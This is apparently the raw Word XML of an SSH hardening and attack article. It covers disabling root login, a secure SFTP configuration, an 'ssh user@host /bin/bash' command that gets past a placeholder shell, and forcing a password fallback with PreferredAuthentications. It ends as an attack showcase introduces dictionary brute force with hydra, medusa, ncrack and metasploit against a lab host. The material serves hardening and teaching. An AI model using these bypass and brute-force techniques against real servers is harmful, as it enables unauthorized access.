            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="057DFF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>paramiko</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> – Python SSHv2 protocol library</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5314279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textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Common configuration mistakes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473FE9B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2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Root login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F679E8"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7BDCB5"/>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 xml:space="preserve">By default most SSH server implementation will allow root login, it is advised to disable it because if the credentials of this accounts leaks, attackers will get </w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>administrative privileges directly and this will also allow attackers to conduct bruteforce attacks on this account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAFA45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How to disable root login for openSSH:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10410044" w14:textId="77777777" w:rsidR="006F2E38" w:rsidRPr="006F2E38" w:rsidRDefault="006F2E38" w:rsidP="006F2E38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Edit SSH server configuration </w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>sudoedit /etc/ssh/sshd_config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B3F603" w14:textId="77777777" w:rsidR="006F2E38" w:rsidRPr="006F2E38" w:rsidRDefault="006F2E38" w:rsidP="006F2E38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Change </w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>#PermitRootLogin yes</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> into </w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>PermitRootLogin no</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF1AB9B" w14:textId="77777777" w:rsidR="006F2E38" w:rsidRPr="006F2E38" w:rsidRDefault="006F2E38" w:rsidP="006F2E38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Take into account configuration changes: </w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>sudo systemctl daemon-reload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44511CF8" w14:textId="77777777" w:rsidR="006F2E38" w:rsidRPr="006F2E38" w:rsidRDefault="006F2E38" w:rsidP="006F2E38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Restart the SSH server </w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>sudo systemctl restart sshd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D130C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2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>SFTP command execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52485413"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7BDCB5"/>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Another common SSH misconfiguration is often seen in SFTP configuration. Most of the time when creating a SFTP server the administrator want users to have a SFTP access to share files but not to get a remote shell on the machine. So they think that creating a user, attributing him a placeholder shell (like </w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>/usr/bin/nologin</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> or </w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>/usr/bin/false</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>) and chrooting him in a jail is enough to avoid a shell access or abuse on the whole file system. But they are wrong, a user can ask to execute a command right after authentication before it’s default command or shell is executed. So to bypass the placeholder shell that will deny shell access, one only has to ask to execute a command (eg. </w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>/bin/bash</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>) before, just by doing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCE2F6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ssh -v noraj@192.168.1.94 id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFD355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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF544C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Password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5C098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Authentication succeeded (keyboard-interactive).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E5DF8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Authenticated to 192.168.1.94 ([192.168.1.94]:22).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BCF7F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channel 0: new [client-session]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8181D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Requesting no-more-sessions@openssh.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5FF1E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Entering interactive session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CFCCA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pledge: network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EA592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client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6B72D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Sending command: id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B210F4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client_input_channel_req: channel 0 rtype exit-status reply 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E54C01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client_input_channel_req: channel 0 rtype eow@openssh.com reply 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145AC26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uid=1000(noraj) gid=100(users) groups=100(users)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E1716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channel 0: free: client-session, nchannels 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC7E01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Transferred: sent 2412, received 2480 bytes, in 0.1 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DECDFB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Bytes per second: sent 43133.4, received 44349.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435072E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Exit status 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00561EC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02E79DF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ssh noraj@192.168.1.94 /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA41F9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lastRenderedPageBreak/>
        <w:t>Here is an example of secure SFTP configuration (</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>/etc/ssh/sshd_config</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> – openSSH) for the user </w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>noraj</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555CCCA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Match User noraj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64249A7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ChrootDirectory %h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B47B82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ForceCommand internal-sftp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39717F7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AllowTcpForwarding no</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523418C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PermitTunnel no</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A8542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X11Forwarding no</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB03FC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PermitTTY no</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138C255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This configuration will allow only SFTP: disabling shell access by forcing the start command and disabling TTY access but also disabling all kind of port forwarding or tunneling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028239B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2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Authentication methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58ED5F59"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7BDCB5"/>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On high security environment it’s a common practice to enable only key-based or two factor authentication rather than the simple factor password based authentication. But often the stronger authentication methods are enabled without disabling the weaker ones. A frequent case is enabling </w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>publickey</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> on openSSH configuration and setting it as the default method but not disabling </w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>. So by using the verbose mode of the SSH client an attacker can see that a weaker method is enabled:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256FBDD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ssh -v 192.168.1.94</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD1B54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OpenSSH_8.1p1, OpenSSL 1.1.1d  10 Sep 2019</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A24EB3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255F94B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Authentications that can continue: publickey,password,keyboard-interactive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED7EE4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For example if an authentication failure limit is set and you never get the chance to reach the password method, you can use the </w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>PreferredAuthentications</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> option to force to use this method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDC87B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ssh -v 192.168.1.94 -o PreferredAuthentications=password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535019C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F8CE8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debug1: Next authentication method: password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1769C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Review the SSH server configuration is necessary to check that only expected</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:br/>
        <w:t>methods are authorized. Using the verbose mode on the client can help to see</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:br/>
        <w:t>the effectiveness of the configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4341F09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textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Attack showcase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B820B5"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F78DA7"/>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Now we’ll see a set of attack examples that you can reproduce on some SSH server implementations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CB94A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2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Password guessing/bruteforce attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7212766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I will now run through an improved variation of “brute forcing” an SSH user password with a password dictionary using four tools: the </w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> framework, </w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>hydra</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>medusa</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> and </w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>ncrack</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4956106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In all cases we will target the machine </w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>192.168.1.94</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>, on port 22 and will bruteforce only the password of the user </w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>noraj</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
